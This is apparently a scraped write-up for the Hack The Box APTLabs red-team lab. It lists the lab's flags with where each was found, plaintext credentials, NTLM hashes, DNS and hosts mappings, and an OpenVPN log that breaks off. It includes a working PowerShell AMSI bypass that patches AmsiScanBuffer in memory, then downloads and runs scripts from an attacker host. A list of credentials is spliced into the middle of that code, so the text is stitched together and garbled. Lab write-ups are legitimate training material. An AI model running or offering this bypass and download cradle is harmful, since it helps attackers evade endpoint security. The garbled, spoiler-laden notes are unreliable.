APTLabs ProLab Writeup - Hack The Box

APTLabs ProLab Writeup APTLabs ProLab Writeup APTLabs Premise Flags SOP EDR Bypass creds machines DNS mapping /etc/host local modofications krb5.conf modifications vpn details APTLabs-Perimeter 10.10.110.13 10.10.110.62 10.10.110.74 10.10.110.88 10.10.110.231 10.10.110.242 Phishing - Beachhead 0X0SECURITY.LOCAL APT-0X0SEC-NEXTCLOUD APT-0X0SEC-ADFS, adfs.0x0security.local GIGANTICHOSTING.LOCAL APT-MSP-SD, servicedesk.gigantichosting.local Unintented way to access servicedsk as admin Intented way RCE MEGABANK.LOCAL APT-MEGABANK-SERVER04 - server04.megabank.local Bypass AMSI SOP / Cobaltstrike RBCD NTLM Relay attack on server04.megabank.local APT-MEGABANK-SERVER03, server03.megabank.local Relay on GMSA APT-MEGABANK-DC, primary.megabank.local APT-MEGABANK-SERVER05, server05.megabank.local APT-MSP-SCCM, sccm.gigantichosing.local ORBITFISH.LOCAL APT-ORBITFISH-SRV002,srv002.orbitfish.localAPT-ORBITFISH-SRV001 srv001.orbitfish.local APT-ORBITFISH-DC, dc.orbitfish.local CUBANO.LOCAL APT-CUBANO-DEV, DEV.CUBANO.LOCAL APT-CUBANO-EXCHANGE, exchange.cubano.local APT-CUBANO-DC, dc.cubano.local APT-CUBANO-WEB, web.cubano.local RAW NOTES Cobalt strike APTLabs Premise Flags APTLabs simulates a targeted attack by an external threat agent against an MSP (Managed Service Provider). The lab requires prerequisite knowledge of attacking Active Directory networks. APTLabs consists of fully patched servers, prevalent enterprise technologies, a simulated WAN network, and much more! Your goal is to compromise all client networks and reach Domain Admin wherever possible. On completion of this lab you will be familiar with long-lasting TTPs, how to abuse enterprise technology, and be a true google-ninja. This is an extremely challenging Red Team Operator Level III lab, that will push you to the limit, and put your skills to the test in the following areas: Active Directory enumeration and exploitation Bypassing security features such as 2FA, JEA and WDAC Exploiting interactive users Kerberos attacks Lateral movement between multiple forests Reaching your goals without using any CVEs Certified secure..?: APTLABS{C3RT!FICAT3_M@NAG3R}, http://10.10.110.62:8080/admin/ Why is it always this?: APTLABS{R00t_Dn$_AdM!n} (https://10.10.110.13/admin/, domains tabs) Password123: APTLABS{P@sS0rD_R3Us3} {sqlmap on 10.10.110.88} I do enjoy fishing: APTLABS{M@lTiF@cT0R_PhI$h!nG}, passsafe on nextcloud account of robert I've just had enough of it...: APTLABS{AiNt_J3a_Ju$T_Gr3At}, C:\Users\adfs_svc\Documents on adfs.0x0security.local Who will provide my identity?: APTLABS{Y0u_B3c0M3_Th3_S@mL_pR0vId3R}, Admin Desktop on servicedesk.gigantichosting.local Look busy, carry some cables, clipboard etc.: APTLABS{@lW@$_W@nT3d_T0_b3_@_$yS@dM!N} (administrator on sccm.gigantichosting) Start thinking laterally: APTLABS{LaT3r@L_M0v3M3nT_w!Th_$CcM_@g3Nt}, (administrator on srv002.orbitfish.local)SOP EDR Bypass Chained powershell AMSI bypass meowme.ps1 I know Kerberos: APTLABS{L3g!t_KiRb!_3DiT0R}, (administrator on srv001.orbitfish.local) I should stay on-prem: APTLABS{AdC0nN3cT_pWn@G3}, (administrator on dc.orbitfish.local) Welcome to cubano: APTLABS{0N3_w@Y_t0_@Bu$3_Sp00LeR_bUg}, (administrator on dev.cubano.local) Not again: APTLABS{An0Th3R_w@Y_t0_@Bu$3_Sp00LeR_bUg}, (administrtor on exchange.cubano.local) This ain't right: APTLABS{@d!Dn$_4_Cr3D3nTi@L$}, (administrator on web.cubano.local) Good game: APTLABS{D0m@iN_C0mPr0MiSe}, (administrator on dc.cubano.local) Can i trust you?: APTLABS{Th3_P@M_@Dm!n}, C:\Users\s.helmer\Desktop on server04.megabank.local I thought so...: APTLABS{Th3_SQL_@Dm!n}, C:\Users\Administrator\Desktop on server04.megabank.local This is bad, very, very bad, APTLABS{L3Ts_Br3Ak_!T}, Get-Flag on server03.megabank.local Who could have thought?: APTLABS{P@m_@Dm!nI$tR@t0R}, C:\Users\Administrator\Desktop on server05.megabank.local You cant restrict me!: APTLABS{wD@C_ByP@s$!}, C:\Users\remote_admin on primary.megabank.local There are two types of people...: APTLABS{R3tuRn_0F_tH3_b@CkUp_@DmIn} C:\Users\Administrator.GIGANTICHOSTING on primary.megabank.local $Meow = ' using System; using System.Runtime.InteropServices; public class Meow { [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern void CopyMemory(IntPtr dest, IntPtr src, uint count); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); public static void cp(byte[] source, IntPtr dest, int count) { Marshal.Copy(source, 0, dest, count); }Oneliners for use with above creds [email protected] | +90 433 794 13 53 | $Ul3S@t0x0S3c | mak -> work on ADFS/servicesk and 0x0security.local [email protected] | +90 921 525 87 74 | iL0v3l!nux | linuxrobert sshuser:ca!@vyhjyt@#$!@31CASDF&^*3451@WADSFewr -> landfall robert : aep!@#vae$#12ces -> nextcloud robert account [email protected] | +90 653 111 67 35 | P@ssw0rd1! | Junglelee [email protected] | +90 763 995 34 55 | P@ssw0rd1! [email protected] | +90 432 652 14 13 | P@ssw0rd1! [email protected] | APTLABS{P@sS0rD_R3Us3} | P@ssw0rd1! -> working on django 10.10.110.62:8080/admin [email protected] [email protected] 0x0security.local\adfs_svc:S3cur!ty } ' ; Add-Type $Meow; $LoadLibrary = [Meow]::LoadLibrary("a" + "m" + "si.dll"); $Address = [Meow]::GetProcAddress($LoadLibrary, "Am" + "si" + "Sc" + "an" + "Bu" + "ff" + "er"); $p = 0; [Meow]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p); $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3); [Meow]::cp($Patch, $Address, 6); iex ((new-object net.webclient).downloadstring("http://10.10.14.15/meowme.ps1"));iex ((new-object net.webclient).downloadstring("http://10.10.14.15/PowerUpSQL.ps1")) gigantichosting.local\j.smith:Qwerty1! gigantichosting.local\s.svensson:Qwerty123 gigantichosting.local\l.larsson:Password123 gigantichosting.local\l.rodriguez:London10 gigantichosting.local\s.helmer:Hades123 gigantichosting.local\j.johson:Airf0rce! megabank.local\svc_ata:Password123 megabank.local\svc_ata:Password123 megabank\fs1_msa$:0725cf9212c29a0189283e0743d76093 megabank\backup$:0d46799eac240946d4c7b104b995154dmachines DNS mapping megabank\remote_admin:22be2f4edecb047c1529ad275fd82fe3 megabank\administrator:41aa70e55117291f881dfd1ac40fdbbf orbitfish\administrator:0992565d28deb9171500709a40e92a9e cubano\administrator:aec91a06b0490d1ed48cba994e9d472e APT-FW01 [ ]APT-0X0SEC-NEXTCLOUD nextcloud(linux), 192.168.20.31 [ ]APT-0X0SEC-ADFS adfs.0x0security.local, 192.168.20.15 [ ]APT-0X0SEC-DC dc.0x0security.local, 192.168.20.10 [ ]APT-MSP-DC dc.gigantichosting.local, 192.168.21.10 [ ]APT-MSP-SD servicedesk.gigantichosting.local, 192.168.21.123 [ ]APT-MSP-SCCM sccm.gigantichosting.local, 192.168.21.155 [ ]APT-MEGABANK-DC primary.megabank.local, 192.168.24.10 [ ]APT-MEGABANK-SERVER04 server04.megabank.local, 192.168.24.112 [ ]APT-MEGABANK-SERVER03 server03.megabank.local, 192.168.24.155 [ ]APT-MEGABANK-SERVER05 server05.megabank.local, 192.168.24.118 [ ]APT-ORBITFISH-DC dc.orbitfish.local, 192.168.22.10 [ ]APT-ORBITFISH-SRV001 srv001.orbitfish.local, 192.168.22.123 [ ]APT-ORBITFISH-SRV002 srv002.orbitfish.local, 192.168.22.16 [ ]APT-CUBANO-DC dc.cubano.local, 192.168.23.10 [ ]APT-CUBANO-DEV dev.cubano.local, 192.168.23.164 [ ]APT-CUBANO-EXCHANGE exchange.cubano.local, 192.168.23.146 [ ]APT-CUBANO-WEB web.cubano.local, 192.168.23.200 #beachhead nextcloud nix box: 192.168.20.31 #0x0security 0x0security.local. 3600 IN A 192.168.20.10 dc.0x0security.local. 3600 IN A 192.168.20.10 adfs.0x0security.local. 3600 IN A 192.168.20.15 #gigantichosting gigantichosting.local. 3600 IN A 192.168.21.10 dc.gigantichosting.local. 3600 IN A 192.168.21.10 servicedesk.gigantichosting.local. 1200 IN A 192.168.21.123 sccm.gigantichosting.local. 1200 IN A 192.168.21.155 #orbitfish dc.orbitfish.local. 3600 IN A 192.168.22.10 orbitfish.local. 600 IN A 192.168.22.10 srv001.orbitfish.local. 1200 IN A 192.168.22.123 srv002.orbitfish.local. 1200 IN A 192.168.22.16 #cubano cubano.local. 600 IN A 192.168.23.10 dc.cubano.local. 600 IN A 192.168.23.10/etc/host local modofications krb5.conf modifications exchange.cubano.local. 1200 IN A 192.168.23.146 dev.cubano.local. 1200 IN A 192.168.23.164 web.cubano.local. 1200 IN A 192.168.23.200 #megabank megabank.local. 600 IN A 192.168.24.10 dc.megabank.local. 600 IN A 192.168.24.10, primary.megabank.local server03.megabank.local. 1200 IN A 192.168.24.155 server04.megabank.local. 1200 IN A 192.168.24.112 server05.megabank.local. 1200 IN A 192.168.24.118 # APTLABS PROLAB ------- 10.10.110.74 apt-0x0sec-nextcloud landfall 10.10.110.231 nextcloud.0x0security.com storage.0x0security.com 0x0security.com 10.10.14.15 phish.00security.com ## 0x0security.local 10.10.14.15 nextcloud.00security.com 192.168.20.15 adfs.0x0security.local 192.168.20.10 dc.0x0security.local 0x0security.local ## gigantichosting.local 192.168.21.123 servicedesk.gigantichosting.local 192.168.21.10 gigantichosting.local dc.gigantichosting.local 192.168.21.155 sccm.gigantichosting.local ## megabank.local 192.168.24.112 server04.megabank.local 192.168.24.155 server03.megabank.local 192.168.24.118 server05.megabank.local 192.168.24.10 megabank.local MEGABANK primary.megabank.local ## cubano.local 192.168.23.10 dc.cubano.local cubano.local 192.168.23.164 dev.cubano.local 192.168.23.146 exchange.cubano.local 192.168.23.200 web.cubano.local ## orbitfish.local 192.168.22.10 dc.orbitfish.local orbitfish.local 192.168.22.123 srv001.orbitfish.local 192.168.22.16 srv002.orbitfish.local # 0------------------vpn details MEGABANK.LOCAL = { kdc = primary.megabank.local } C UBANO.LOCAL = { kdc = dc.cubano.local } O RBITFISH.LOCAL = { kdc = dc.orbitfish.local } root@nix36:~/aptlabs# ls . .. SessionGopher.ps1 binaries eu-apt-1-hoxh4.ovpn root@nix36:~/aptlabs# openvpn eu-apt-1-hoxh4.ovpn 2020-12-09 22:42:49 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set. 2020-12-09 22:42:49 DEPRECATED OPTION: --cipher set to 'AES-128-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-128-CBC' to --data-ciphers or change --cipher 'AES-128-CBC' to --data-ciphers-fallback 'AES-128-CBC' to silence this warning. 2020-12-09 22:42:49 OpenVPN 2.5.0 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Oct 28 2020 2020-12-09 22:42:49 library versions: OpenSSL 1.1.1h 22 Sep 2020, LZO 2.10 2020-12-09 22:42:49 Outgoing Control Channel Authentication: Using 256 bit message hash 'SHA256' for HMAC authentication 2020-12-09 22:42:49 Incoming Control Channel Authentication: Using 256 bit message hash 'SHA256' for HMAC authentication 2020-12-09 22:42:49 TCP/UDP: Preserving recently used remote address: [AF_INET]23.106.32.44:1337 2020-12-09 22:42:49 Socket Buffers: R=[212992->212992] S=[212992->212992] 2020-12-09 22:42:49 UDP link local: (not bound) 2020-12-09 22:42:49 UDP link remote: [AF_INET]23.106.32.44:1337 2020-12-09 22:42:49 TLS: Initial packet from [AF_INET]23.106.32.44:1337, sid=4c914866 3b13a036 2020-12-09 22:42:49 VERIFY KU OK 2020-12-09 22:42:49 Validating certificate extended key usage 2020-12-09 22:42:49 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication 2020-12-09 22:42:49 VERIFY EKU OK 2020-12-09 22:42:49 VERIFY OK: depth=0, C=UK, ST=City, L=London, O=HackTheBox, CN=htb, name=htb, [email protected] 2020-12-09 22:42:49 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256- GCM-SHA384, 2048 bit RSA 2020-12-09 22:42:49 [htb] Peer Connection Initiated with [AF_INET]23.106.32.44:1337net details 2020-12-09 22:42:50 SENT CONTROL [